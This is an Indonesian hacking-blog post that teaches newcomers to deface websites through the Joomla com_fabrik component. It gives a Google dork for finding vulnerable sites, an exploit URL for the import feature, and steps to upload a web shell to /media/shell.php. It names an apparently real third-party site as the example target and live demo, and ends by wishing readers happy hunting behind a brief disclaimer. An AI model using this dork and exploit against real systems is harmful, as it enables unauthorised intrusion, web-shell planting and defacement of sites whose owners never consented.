Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti Xline7 pasti masih clingak-clinguk. Maka dari itu Xline7 mau berbagi sesuatu yang sudah Xline7 tahu.
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik" (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercherLangkah2nya :
- Buka eyang google.com
- Masukkan Dorknya tadi inurl:"index.php?option=com_fabrik"
- Pilih target. Misal kita mendapat http://www.elrancho.ch/index.php?option=com_fabrik&lang=de
- Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.elrancho.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
- Upload shell. Dan untuk melihat shell yang telah di upload, buka www.target.com/media/shell.php, dan untuk hasil live demo yaitu www.elrancho.ch/media/shell.php
- Terserah anda :D
Mudah banget kan??? :)
Oke, selamat berburu....
Content ini hanya untuk pembelajaran saja. Xline7 tidak bertanggung jawab atas segala kejadian yang bersifat kejahatan atau merusak.
Artikel Terkait: